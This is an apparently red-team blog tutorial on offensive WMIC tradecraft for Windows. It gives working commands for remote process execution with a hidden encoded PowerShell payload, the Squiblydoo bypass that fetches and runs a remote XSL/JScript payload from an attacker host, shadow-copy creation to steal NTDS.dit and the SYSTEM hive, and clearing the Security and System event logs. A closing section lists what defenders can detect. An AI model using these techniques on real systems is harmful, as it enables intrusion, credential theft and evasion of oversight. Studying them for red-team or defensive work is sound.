The Silent Interrogator: Advanced WMIC for Red Team Operations

Red teaming is a vital aspect of information security. To be effective, we must master the tools that already exist on the target system. One such tool is the Windows Management Instrumentation Command-line (WMIC).

While Microsoft is actively deprecating it in favor of PowerShell (and has converted it to a “Feature on Demand” in Windows 11 22H2 and removal in 24H2), WMIC remains a formidable weapon on the vast majority of enterprise servers and workstations (Windows 10, Server 2016/2019/2022). It allows for system enumeration, remote execution, and lateral movement, often bypassing reliable string-based detections that target strictly PowerShell keywords.

In this article, we’ll explore the advanced offensive capabilities of WMIC, from discovering hidden antivirus configuration to executing arbitrary JScript via stylesheet abuse.

1. Discovery: Beyond the Basics

Basic enumeration is fine, but a pro knows where to look for the “hidden” stuff.

Identifying Antivirus and Firewall Status

Standard service list often obfuscates the real security status. The WMI SecurityCenter2 namespace is the definitive source of truth for registered security products on client OSs.

1
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName, productState, pathToSignedProductExe

Technical Detail: The productState returned is a bitmask. You convert it to hex to understand if the AV is enabled, disabled, or snoozing.

0x1000: Enabled
0x0000: Disabled (Note: Exact values vary by vendor bits, but changes here are significant).

Enumerating Installed Patches (QFE)

Before dropping a Kernel Exploit, check if the patch is already there.

1
2
:: List all Quick Fix Engineering (patches) with installation date
wmic qfe get HotfixId, InstalledOn, Description

Finding User Accounts (The SID Walk)

Instead of net user (which is very noisy), check WMI.

1
wmic useraccount get name, sid, disabled

Pro-Tip: Sort by SID to find the first accounts created (like the built-in Administrator, usually ending in -500).

Listing Startup Persistence

Check if someone else is already persisting on the box, or verify your own persistence.

1
wmic startup get caption, command, location, user

2. Lateral Movement: Remote Execution

WMIC’s ability to interact with DCOM/RPC on remote nodes makes it a classic lateral movement tool. It does not require RDP; it only requires port 135 and the dynamic RPC range.

The “Process Call Create” Method

You can spawn a process on a remote machine using the /node switch.

1
2
:: Syntax: /node:<TargetIP> /user:<Domain\User> /password:<Pass> process call create "<Command>"
wmic /node:"10.10.1.5" /user:"CORP\Admin" /password:"Pass123" process call create "cmd.exe /c start powershell.exe -nop -w hidden -enc [PAYLOAD]"

The Output Problem: WMIC remote execution does not return the STDOUT of the command to your terminal. It only tells you ReturnValue = 0; (Success) and the ProcessId. To get output, you must redirect it to a file on the remote host (> C:\temp\out.txt) and then read that file back via SMB (type \\10.10.1.5\c$\temp\out.txt).

3. The Dangerous “Product” Alias

You might see blogs telling you to run wmic product list.

DO NOT DO THIS.

Querying the Win32_Product class triggers a Windows Installer consistency check on every installed application. This is:

Extremely Slow: It can take minutes to return.
Extremely Noisy: It generates hundreds of Event ID 1035 messages in the Application log (“Windows Installer reconfigured the product…”).

The Better Way: Use the registry or the AntiVirusProduct check mentioned earlier for security tools.

4. Defense Evasion: The XSL Bypass (Squiblydoo)

One of the coolest “Living off the Land” techniques involves abusing WMIC’s output formatting. WMIC can apply an XSL (eXtensible Stylesheet Language) file to format its output. If that XSL file contains JScript or VBScript, WMIC will execute it.

Since wmic.exe is a signed Microsoft binary, this often bypasses AppLocker Script Rules (if wmic.exe is allowed).

The Attack:

1
wmic process get name /format:"http://10.10.14.5/payload.xsl"

The Payload (payload.xsl):

1
2
3
4
5
6
7
8
<ns0:stylesheet xmlns:ns0="http://www.w3.org/1999/XSL/Transform" xmlns:ns1="urn:schemas-microsoft-com:xslt" version="1.0">
  <ns0:output method="text" />
  <ns1:script implements-prefix="user" language="JScript">

var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

</ns1:script>
</ns0:stylesheet>

When you run the command, wmic.exe downloads the file, parses the XML, and executes the ActiveXObject, launching your payload (Calc, C2 beacon, etc.).

5. Shadow Copy Abuse

Like vssadmin, WMIC can manipulate the Volume Shadow Copy Service. This is vital for stealing locked files like NTDS.dit or the SYSTEM hive.

1
2
3
4
5
6
7
8
:: Create a copy of C:
wmic shadowcopy call create Volume="C:\"

:: List to find the ID/Path
wmic shadowcopy list brief

:: Delete a specific shadow copy
wmic shadowcopy where ID="{ID-GOES-HERE}" delete

6. Anti-Forensics: Log Manipulation

WMIC has the power to clear Event Logs. Note that clearing logs is Event ID 1102 (“The audit log was cleared”). This is a huge red flag, but sometimes necessary if you plan to burn the bridge behind you.

1
2
wmic nteventlog where "logfilename='System'" call cleareventlog
wmic nteventlog where "logfilename='Security'" call cleareventlog

7. Forensic Artifacts: The Footprint

Using WMIC isn’t invisible. Here is what the Blue Team sees:

Process Creation: wmic.exe execution is logged in Security Event ID 4688. The command line arguments (like your payload URL) are visible if “Command Line Auditing” is enabled.
WMI-Activity Logs: The specialized log Microsoft-Windows-WMI-Activity/Operational records errors and method execution. This is where lateral movement (WmiPrvSE.exe spawning cmd.exe) stands out.
Network Traffic: Remote WMI requires:
- TCP 135 (DCOM Relay)
- A dynamic high port (usually 49152-65535) for the actual data transfer.
- This is a distinct traffic pattern compared to standard SMB (445).

Conclusion

WMIC is the “silent interrogator” of the Windows world. Even as it ages, its deeply integrated nature makes it a reliable tool for everything from initial recon to lateral movement. By understanding the advanced namespaces (SecurityCenter2) and evasion features (/format: abuse), you significantly expand your tradecraft beyond basic whoami commands.

Respect the tool, know its footprint, and always have a backup plan (like CIM cmdlets).

Happy hunting!

1. Discovery: Beyond the Basics#

Identifying Antivirus and Firewall Status#

Enumerating Installed Patches (QFE)#

Finding User Accounts (The SID Walk)#

Listing Startup Persistence#

2. Lateral Movement: Remote Execution#

The “Process Call Create” Method#

3. The Dangerous “Product” Alias#

4. Defense Evasion: The XSL Bypass (Squiblydoo)#

5. Shadow Copy Abuse#

6. Anti-Forensics: Log Manipulation#

7. Forensic Artifacts: The Footprint#

Conclusion#

References#